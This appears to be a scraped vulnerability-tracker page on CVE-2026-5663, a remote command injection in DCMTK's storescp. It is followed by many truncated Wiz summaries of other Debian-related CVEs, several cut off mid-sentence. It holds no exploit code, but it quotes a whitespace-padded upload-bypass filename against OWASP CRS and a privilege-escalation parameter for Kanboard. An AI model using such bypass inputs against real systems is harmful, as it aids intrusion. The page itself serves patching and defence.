CVE-2026-5663
Published 2026-04-06
Priority P265 · critical · 9.8 (CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS: 1.72% (74.6th percentile)
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. It affects the functions executeOnReception and executeOnEndOfStudy in the file dcmnet/apps/storescp.cc of the storescp component. Manipulation of the affected input results in OS command injection. The vulnerability can be exploited remotely. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8; applying it is the recommended fix.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | dcmtk | — | — |
| offis | dcmtk | <= 3.7.0 | — |
Detection & IOCs (extracted from sources)
- Monitor for OS command injection attempts via crafted DICOM C-STORE requests targeting the storescp component, specifically the executeOnReception/executeOnEndOfStudy functions in dcmnet/apps/storescp.cc
- Inspect inbound DICOM C-STORE requests for malicious payloads that could trigger OS command injection via storescp reception/end-of-study hooks
- Vulnerability affects OFFIS DCMTK up to version 3.7.0; no fix available as of Apr 06, 2026 for affected Linux Debian and Red Hat platforms
- Remote exploitation is possible, meaning storescp instances exposed to untrusted networks are at elevated risk
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 4.0 | 6.9 | MEDIUM | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 6.9 | MEDIUM | — |
| vendor_debian | — | 6.9 | MEDIUM | — |
Debian
vendor_debian · 2026 · CVSS 6.9 · MEDIUM
CVE-2026-5663: dcmtk (same description as above)
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
OSV
osv · 2026-04-06 · CVSS 6.9 · MEDIUM
CVE-2026-5663 (same description as above)
GHSA
ghsa_unreviewed · 2026-04-06 · MEDIUM · CWE-77
GHSA-c42x-qh72-7h87: CVE-2026-5663 (same description as above)
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-2369 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-2369 [MEDIUM] CVE-2026-2369 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2369 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libsoup. An integer underflow vulnerability occurs when processing content with a zero-length resource, leading to a buffer overread. This can allow an attacker to potentially access sensitive information or cause an application level denial of service.
Source : NVD
## 6.5
Score
Published March 19, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup3-debuginfo
libsoup3-devel
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Adde
Wiz
CVE-2026-33691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-33691 [MEDIUM] CVE-2026-33691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33691 :
Linux Debian vulnerability analysis and mitigation
The OWASP core rule set (CRS) is a set of generic attack detection rules for use with compatible web application firewalls. Prior to versions 3.3.9 and 4.25.0, a bypass was identified in OWASP CRS that allows uploading files with dangerous extensions (.php, .phar, .jsp, .jspx) by inserting whitespace padding in the filename (e.g. photo. php or shell.jsp ). The affected rules do not normalize whitespace before evaluating the file extension regex, so the dot-extension check fails to match. This issue has been patched in versions 3.3.9 and 4.25.0.
Source : NVD
## 6.8
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit
Wiz
CVE-2025-67477 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67477 [MEDIUM] CVE-2025-67477 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67477 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.Special.Apisandbox/ApiSandboxLayout.Js.
This issue affects MediaWiki: from * before 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 12, 2025
Debian
Wiz
CVE-2018-25223 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2018-25223 [CRITICAL] CVE-2018-25223 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25223 :
Echo vulnerability analysis and mitigation
Crashmail 1.6 contains a stack-based buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending malicious input to the application. Attackers can craft payloads with ROP chains to achieve code execution in the application context, with failed attempts potentially causing denial of service.
Source : NVD
## 9.3
Score
Published March 28, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 49.2
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
crashmail
Sources
NVD
Echo Severity CRITICAL No Fix Added at: Mar
Wiz
CVE-2023-54279 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54279 [MEDIUM] CVE-2023-54279 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54279 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
MIPS: fw: Allow firmware to pass a empty env
fw_getenv will use env entry to determine style of env,
however it is legal for firmware to just pass a empty list.
Check if first entry exist before running strchr to avoid
null pointer dereference.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-5.15
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31,
Wiz
CVE-2026-23034 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23034 CVE-2026-23034 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23034 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/userq: Fix fence reference leak on queue teardown v2
The user mode queue keeps a pointer to the most recent fence in
userq->last_fence. This pointer holds an extra dma_fence reference.
When the queue is destroyed, we free the fence driver and its xarray,
but we forgot to drop the last_fence reference.
Because of the missing dma_fence_put(), the last fence object can stay
alive when the driver unloads. This leaves an allocated object in the
amdgpu_userq_fence slab cache and triggers
This is visible during driver unload as:
BUG amdgpu_userq_fence: Objects remaining on __kmem_cache_shutdown()
kmem_cache_destroy amdgpu_userq_fence: Slab c
Wiz
CVE-2026-2271 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.3
CVE-2026-2271 [LOW] CVE-2026-2271 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2271 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in GIMP's PSP (Paint Shop Pro) file parser. A remote attacker could exploit an integer overflow vulnerability in the read_creator_block() function by providing a specially crafted PSP image file. This vulnerability occurs when a 32-bit length value from the file is used for memory allocation without proper validation, leading to a heap overflow and an out-of-bounds write. Successful exploitation could result in an application level denial of service.
Source : NVD
## 3.3
Score
Published March 26, 2026
Severity LOW
CNA Score 3.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probab
Wiz
CVE-2025-24857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2025-24857 [HIGH] CVE-2025-24857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-24857 :
Linux Debian vulnerability analysis and mitigation
Improper access control for volatile memory containing boot code in Universal Boot Loader (U-Boot) before 2017.11 and Qualcomm chips IPQ4019, IPQ5018, IPQ5322, IPQ6018, IPQ8064, IPQ8074, and IPQ9574 could allow an attacker to execute arbitrary code.
Source : NVD
## 7.6
Score
Published December 10, 2025
Severity HIGH
CNA Score 7.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
u-boot
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH Has Fix Added at: Dec 22, 2025
Echo Severity HIGH Has Fix Added at:
Wiz
CVE-2025-67899 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.9
CVE-2025-67899 [LOW] CVE-2025-67899 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67899 :
Linux Debian vulnerability analysis and mitigation
uriparser through 0.9.9 allows unbounded recursion and stack consumption, as demonstrated by ParseMustBeSegmentNzNc with large input containing many commas.
Source : NVD
## 2.9
Score
Published December 14, 2025
Severity LOW
CNA Score 2.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mingw64-uriparser
uriparser-debuginfo
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 16, 2025
Debian 14 Severity LOW No Fix Added at: Dec 16, 2025
Echo Severity LOW Has Fix Added at: Dec
Wiz
CVE-2025-68817 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-68817 [HIGH] CVE-2025-68817 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68817 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency
Under high concurrency, A tree-connection object (tcon) is freed on
a disconnect path while another path still holds a reference and later
executes *_put()/write on it.
Source : NVD
## 7.8
Score
Published January 13, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-6.1
linux-azure-nvidia
Sources
NVD
Debian 11, 12, 13,
Wiz
CVE-2026-23322 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23322 CVE-2026-23322 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23322 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ipmi: Fix use-after-free and list corruption on sender error
The analysis from Breno:
When the SMI sender returns an error, smi_work() delivers an error
response but then jumps back to restart without cleaning up properly:
intf->curr_msg is not cleared, so no new message is pulled
newmsg still points to the message, causing sender() to be called again with the same message
If sender() fails again, deliver_err_response() is called with the same recv_msg that was already queued for delivery
This causes list_add corruption ("list_add double add") because the
recv_msg is added to the user_msgs list twice. Subsequently, the
corrupted list leads to u
Wiz
CVE-2026-23443 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23443 [MEDIUM] CVE-2026-23443 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23443 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ACPI: processor: Fix previous acpi_processor_errata_piix4() fix
After commi f132e089fe89 ("ACPI: processor: Fix NULL-pointer dereference
in acpi_processor_errata_piix4()"), device pointers may be dereferenced
after dropping references to the device objects pointed to by them,
which may cause a use-after-free to occur.
Moreover, debug messages about enabling the errata may be printed
if the errata flags corresponding to them are unset.
Address all of these issues by moving message printing to the points
in the code where the errata flags are set.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubunt
Wiz
CVE-2026-23425 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23425 [MEDIUM] CVE-2026-23425 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23425 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Fix ID register initialization for non-protected pKVM guests
kvm
kvm
pkvm_init_features_from_host()
KVM_ARCH_FLAG_ID_REGS_INITIALIZED
id_regs
kvm_has_feat()
ctxt_has_tcrx()
kvm
kvm
KVM_ARCH_FLAG_ID_REGS_INITIALIZED
pkvm_init_features_from_host
vm_copy_id_regs
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian
Wiz
CVE-2026-24029 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-24029 [MEDIUM] CVE-2026-24029 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24029 :
Linux Debian vulnerability analysis and mitigation
When the early_acl_drop (earlyACLDrop in Lua) option is disabled (default is enabled) on a DNS over HTTPs frontend using the nghttp2 provider, the ACL check is skipped, allowing all clients to send DoH queries regardless of the configured ACL.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Apr 02, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Ap
Wiz
CVE-2025-6592 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2025-6592 [LOW] CVE-2025-6592 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6592 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation AbuseFilter. This vulnerability is associated with program files includes/auth/AuthManager.Php.
This issue affects AbuseFilter: from fe0b1cb9e9691faf4d8d9bd80646589f6ec37615 before 1.43.2, 1.44.0.
Source : NVD
## 2.1
Score
Published February 2, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has Fix Added at: Aug 10, 2025
## Get a CVE risk assessment
Get a pri
Wiz
CVE-2026-23469 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23469 CVE-2026-23469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23469 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/imagination: Synchronize interrupts before suspending the GPU
The runtime PM suspend callback doesn't know whether the IRQ handler is
in progress on a different CPU core and doesn't wait for it to finish.
Depending on timing, the IRQ handler could be running while the GPU is
suspended, leading to kernel crashes when trying to access GPU
registers. See example signature below.
In a power off sequence initiated by the runtime PM suspend callback,
wait for any IRQ handlers in progress on other CPU cores to finish, by
calling synchronize_irq().
At the same time, remove the runtime PM resume/put calls in the threaded
IRQ handler. On top of not bei
Wiz
CVE-2023-54188 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54188 [MEDIUM] CVE-2023-54188 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54188 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: apple-admac: Fix 'current_tx' not getting freed
In terminate_all we should queue up all submitted descriptors to be
freed. We do that for the content of the 'issued' and 'submitted' lists,
but the 'current_tx' descriptor falls through the cracks as it's
removed from the 'issued' list once it gets assigned to be the current
descriptor. Explicitly queue up freeing of the 'current_tx' descriptor
to address a memory leak that is otherwise present.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due
Wiz
CVE-2026-29056 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-29056 [HIGH] CVE-2026-29056 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29056 :
Linux Debian vulnerability analysis and mitigation
UserInviteController::register()
UserModel::create()
role
role=app-admin
Source : NVD
## 7
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.6
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
kanboard
Sources
NVD
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Technologies
Compo
Wiz
CVE-2025-34457 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-34457 [HIGH] CVE-2025-34457 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-34457 :
Linux Debian vulnerability analysis and mitigation
wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 694c954, contain a stack-based buffer overflow vulnerability in the function kiss_rec_byte() located in src/kiss_frame.c. When processing crafted KISS frames that reach the maximum allowed frame length (MAX_KISS_LEN), the function appends a terminating FEND byte without reserving sufficient space in the stack buffer. This results in an out-of-bounds write followed by an out-of-bounds read during the subsequent call to kiss_unwrap(), leading to stack memory corruption or application crashes. This vulnerability may allow remote unauthenticated attackers to trigger a denial-of-service condition.
Source : NVD
## 8.7
Score
Published Decembe
Wiz
CVE-2026-4887 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4887 [MEDIUM] CVE-2026-4887 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4887 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in GIMP. This issue is a heap buffer over-read in GIMP PCX file loader due to an off-by-one error. A remote attacker could exploit this by convincing a user to open a specially crafted PCX image. Successful exploitation could lead to out-of-bounds memory disclosure and a possible application crash, resulting in a Denial of Service (DoS).
Source : NVD
## 6.1
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
gimp-devel
Wiz
CVE-2023-54139 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54139 [MEDIUM] CVE-2023-54139 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54139 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
tracing/user_events: Ensure write index cannot be negative
The write index indicates which event the data is for and accesses a
per-file array. The index is passed by user processes during write()
calls as the first 4 bytes. Ensure that it cannot be negative by
returning -EINVAL to prevent out of bounds accesses.
Update ftrace self-test to ensure this occurs properly.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPS
Wiz
CVE-2023-53986 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-53986 CVE-2023-53986 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53986 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mips: bmips: BCM6358: disable RAC flush for TP1
RAC flush causes kernel panics on BCM6358 with EHCI/OHCI when booting from TP1:
[ 3.881739] usb 1-1: new high-speed USB device number 2 using ehci-platform
[ 3.895011] Reserved instruction in kernel code[#1]:
[ 3.900113] CPU: 0 PID: 1 Comm: init Not tainted 5.10.16 #0
[ 3.905829] $ 0 : 00000000 10008700 00000000 77d94060
[ 3.911238] $ 4 : 7fd1f088 00000000 81431cac 81431ca0
[ 3.916641] $ 8 : 00000000 ffffefff 8075cd34 00000000
[ 3.922043] $12 : 806f8d40 f3e812b7 00000000 000d9aaa
[ 3.927446] $16 : 7fd1f068 7fd1f080 7ff559b8 81428470
[ 3.932848] $20 : 00000000 00000000 55590000 77d70000
[ 3.938251] $24
Wiz
CVE-2026-1766 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1766 [MEDIUM] CVE-2026-1766 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1766 :
Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor (ID3v2.3 COMM Tags)]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tracker-miner-files
tracker-miners
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 18.04, 20.04 Severity MEDIUM No Fix Added at: Feb 20, 2026
Wiz
CVE-2025-14308 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2025-14308 [CRITICAL] CVE-2025-14308 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14308 :
Linux Debian vulnerability analysis and mitigation
An integer overflow vulnerability exists in the write method of the Buffer class in Robocode version 1.9.3.6. The method fails to properly validate the length of data being written, allowing attackers to cause an overflow, potentially leading to buffer overflows and arbitrary code execution. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the data length, leading to potential unauthorized code execution.
Source : NVD
## 10
Score
Published December 9, 2025
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2022-50707 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50707 [MEDIUM] CVE-2022-50707 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50707 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
virtio-crypto: fix memory leak in virtio_crypto_alg_skcipher_close_session()
'vc_ctrl_req' is alloced in virtio_crypto_alg_skcipher_close_session(),
and should be freed in the invalid ctrl_status->status error handling
case. Otherwise there is a memory leak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at:
Wiz
CVE-2026-31391 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31391 [MEDIUM] CVE-2026-31391 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31391 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: atmel-sha204a - Fix OOM ->tfm_count leak
If memory allocation fails, decrement ->tfm_count to avoid blocking
future reads.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Apr 05, 2026
Debian 14 Has Fix Added at: Apr 05, 2026
Echo Has Fix Added at: Apr 05, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MED
Wiz
CVE-2025-11173 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-11173 [MEDIUM] CVE-2025-11173 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11173 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation OATHAuth. This vulnerability is associated with program files src/Special/OATHManage.Php.
This issue affects OATHAuth: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 03, 2025
Echo Has Fix Added at: Nov 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so yo
Wiz
CVE-2026-27475 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-27475 [CRITICAL] CVE-2026-27475 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27475 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Insecure Deserialization in the public area through the table_valeur filter and the DATA iterator, which accept serialized data. An attacker who can place malicious serialized content (a pre-condition requiring prior access or another vulnerability) can trigger arbitrary object instantiation and potentially achieve code execution. The use of serialized data in these components has been deprecated and will be removed in SPIP 5. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
## 9.2
Score
Published February 19, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Dat
Wiz
CVE-2022-50854 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2022-50854 CVE-2022-50854 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50854 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nfc: virtual_ncidev: Fix memory leak in virtual_nci_send()
skb should be free in virtual_nci_send(), otherwise kmemleak will report
memleak.
Steps for reproduction (simulated in qemu):
cd tools/testing/selftests/nci
make
./nci_dev
BUG: memory leak
unreferenced object 0xffff888107588000 (size 208):
comm "nci_dev", pid 206, jiffies 4294945376 (age 368.248s)
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
[] __alloc_skb+0x1da/0x290
[] nci_send_cmd+0xa3/0x350
[] nci_reset_req+0x6b/0xa0
[] __nci_request+0x90/0x250
[] nci_dev_up+0x217/
Wiz: CVE-2026-23435 Impact, Exploitability, and Mitigation Steps
## CVE-2026-23435: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
perf/x86: Move event pointer setup earlier in x86_pmu_enable()
A production AMD EPYC system crashed with a NULL pointer dereference
in the PMU NMI handler:
BUG: kernel NULL pointer dereference, address: 0000000000000198
RIP: x86_perf_event_update+0xc/0xa0
Call Trace: amd_pmu_v2_handle_irq+0x1a6/0x390
perf_event_nmi_handler+0x24/0x40
cmpq $0x0, 0x198(%rdi)
if (unlikely(!hwc->event_base))
drgn inspection of the vmcore on CPU 106 showed a mismatch between
cpuc->active_mask and cpuc->events[]:
active_mask: 0x1e (bits 1, 2, 3, 4)
events[1]: 0xff1100136cbd4f38 (valid)
events[2]: 0x0 (NULL, but active_mask bit 2 set)
events[3]: 0xff1100076fd2cf38 (val
Wiz: CVE-2022-50877 Impact, Exploitability, and Mitigation Steps (CVSS 5.3, MEDIUM)
